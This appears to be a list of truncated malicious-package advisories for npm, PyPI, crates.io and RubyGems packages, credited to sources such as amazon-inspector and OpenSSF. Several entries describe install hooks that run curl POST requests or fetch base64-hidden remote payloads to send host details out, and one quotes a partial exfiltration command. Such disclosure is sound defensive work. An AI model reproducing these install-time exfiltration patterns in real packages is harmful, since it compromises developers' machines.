Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

MAL-2026-6459 Malicious code in easy-string-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...

Malicious code in zomato-server (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00 The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...

Malicious code in js-shared-modules (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b5d28882e3ff8afe78db631ca5e1129d2b08f976f17f66ffe2b14834184ce09a package.json declares "postinstall": "node poc.js", which fires automatically on every npm install. poc.js reads os.hostname, hex-encodes it, and...

MAL-2026-4184 Malicious code in stripe-internal-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b6add7fd3034c5b0d00e39e2cbfeb7c664085ef412612b53ebe9fd81767449be package.json declares a postinstall hook that auto-fires on npm install and performs reconnaissance + exfiltration against the installer. The inline...

Malicious code in npmjs_solc-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b789c7234e3c391e6e2f6359d87f873205fb341c1bf186194815b16d53c7fa71 The package.json defines a postinstall lifecycle hook that invokes childprocess.exec to run curl -s...

Malicious code in money-badger-open-rpc-test-bugbount (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 35c3ecacb08f3cfb0b165eadaafd3a0d6acfffc34898a6149370c8cc9ba3843e The package money-badger-open-rpc-test-bugbount was found to contain malicious code. Source: ossf-package-analysis...

MAL-2026-3361 Malicious code in 24712-pl5004 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3d79bb37b62b8d47ca459db0858a93ffb3c35e3791423c11a0853fb4ab17388e The package 24712-pl5004 was found to contain malicious code. Source: ossf-package-analysis...

MAL-2026-3103 Malicious code in amzn_codewhisperer_streaming_client (crates.io)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 7fc27be867bc1ae651b345d2f825d0ac8d796615c022747306e87bd3ff0d1fc8 The OpenSSF Package Analysis project identified 'amzn-codewhisperer-streaming-client' @ 99.0.1 crates.io as malicious. It is considered maliciou...

MAL-2026-3017 Malicious code in react-spa-npm (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 43b35510ff33bc6f887152176f91fb63f2a336c8822c151ac6039ccced83c96b The package react-spa-npm was found to contain malicious code. Source: ghsa-malware c9044f471d6c131db0da2c97994b81cd8d2680486695f42dec152b2b23f5e0be...

MAL-2026-2985 Malicious code in @bmg-web/bmg-dialog (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9d560386e011639d154483a6156d3ffca4b0f0c58b20063d6e8ea51d5a295d2a The package @bmg-web/bmg-dialog was found to contain malicious code. Source: ossf-package-analysis...

MAL-2026-2920 Malicious code in buffer-util-extend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 374d8c5c4c32544741d1ea3788cfbccc3ee175f7181f8bdfa71cf4fde44121eb On require/import, index.js decodes a base64 string literal to https://www.jsonkeeper.com/b/CWOV9, fetches that anonymous JSON paste, and passes the...

Malicious code in ixosmonitoring (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 cfca4d7a38a0805f56b3bddcef1b421a8584a4d52df7a1a22676369679347bf5 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

Malicious code in ks-hex2pcap (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 90b58f7aa303c563186a1d1c2a89d13caec4e0c04a48f6838fcba294b7846e96 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

MAL-2026-2266 Malicious code in monolith-twirp-copilot-registry (RubyGems)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis d1eb9592b2f976d7d487d44c8f45592b2953e5f51edfeee7242e020dfb64176f The OpenSSF Package Analysis project identified 'monolith-twirp-copilot-registry' @ 1.0.6 rubygems as malicious. It is considered malicious...

MAL-2026-2239 Malicious code in chaostoolkit-turbulence (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 0d12e5d6a53ae410fe90d76b8da4f9f117a8891e73a678c5b5f49059ad31fa6b Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

MAL-2026-2235 Malicious code in srcsrctest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a44b46855732b5a5522c0a1ea3ef88d5977daad1bfa5c39b42e0324e52fcf6f8 The package srcsrctest was found to contain malicious code. Source: ossf-package-analysis...

MAL-2026-2234 Malicious code in security-install-analytics (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ae1479aa9ec70d315ba69eec145d02655fe633a7f253ba7b0b3d082895b1ca35 The package security-install-analytics was found to contain malicious code. Source: ossf-package-analysis...

MAL-2026-2171 Malicious code in globally (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 1f2d16dd9f9dc8f8c54504946e96b931fab9f6c893012e17b0c03dd531c49f5b Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

MAL-2026-2007 Malicious code in uniswap-info (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a4b0c2ab6814aa67c139dffb11add8c0013caa86df1cffd6c9e1c0de09bd395c The package uniswap-info was found to contain malicious code. Source: ossf-package-analysis...